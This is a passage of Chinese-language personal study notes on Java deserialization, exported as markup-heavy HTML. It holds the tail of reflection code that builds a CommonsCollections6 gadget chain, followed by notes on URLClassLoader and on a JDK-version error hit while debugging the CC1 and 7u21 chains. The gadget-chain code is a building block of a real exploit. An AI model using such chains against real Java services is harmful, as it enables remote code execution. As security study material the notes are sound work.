              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">Reflections</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">setAccessible</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">f2</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> array </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[])</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> f2</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">get</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">innimpl</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//获取map属性的table属性，里面包含很多Node</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> node </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> array</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">0</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">];</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">node </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">==</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">){</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span>node </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> array</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">1</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">];</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Field</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> keyField </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">try</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">{</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span>keyField </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> node</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getClass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">().</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"key"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">catch</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Exception</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> e</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">){</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span>keyField </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">forName</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"java.util.MapEntry"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">).</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"key"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">Reflections</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">setAccessible</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">keyField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">keyField</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">set</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">node</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> entry</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//将其中一个Node的key属性改为entry</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">return</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> map</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:cc6-2;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Calibri;">java字节码</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">—所有能够恢复成一个类并在JVM虚拟机里加载的字节序列，都在我们的探讨范围内</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">URLClassLoader 实际上是我们平时默认使用的 AppClassLoader 的父类，所以，我们解释              URLClassLoader 的工作过程实际上就是在解释默认的Java类加载器的工作流程。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">正常情况下，Java会根据配置项 sun.boot.class.path 和 java.class.path 中列举到的基础路径（这              些路径是经过处理后的 java.net.URL 类）来寻找.class文件来加载，而这个基础路径有分为三种情况：</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">URL未以斜杠 / 结尾，则认为是一个JAR文件，使用 JarLoader 来寻找类，即为在Jar包中寻              找.class文件</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">URL以斜杠 / 结尾，且协议名是 file ，则使用 FileLoader 来寻找类，即为在本地文件系统中寻              找.class文件</span></span></span></p><p style="mso-style-parent: '';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;margin-left: 36.0pt;text-indent: -24.0pt;"><span style="font-family:Cambria;">•</span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">URL以斜杠 / 结尾，且协议名不是 file ，则使用最基础的 Loader 来寻找类</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">直接偷懒使用p牛的字节码会报错</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">Hello </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">:</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> Unsupported major</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">minor</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> version </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FloatTok';color: #40A070;font-family: Consolas;">52.0</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">原因是jdk版本不同，因为调试cc1等低版本链子以及7u21的原生链子，所以我的jdk版本搞得很低是oracle jdk7u21，渣性能虚拟机懒得在idea里来回切jdk</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">需要自己写个类编译好然后读取并编码</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">package</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;"> org</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">test</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">ser</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              

              

              

              

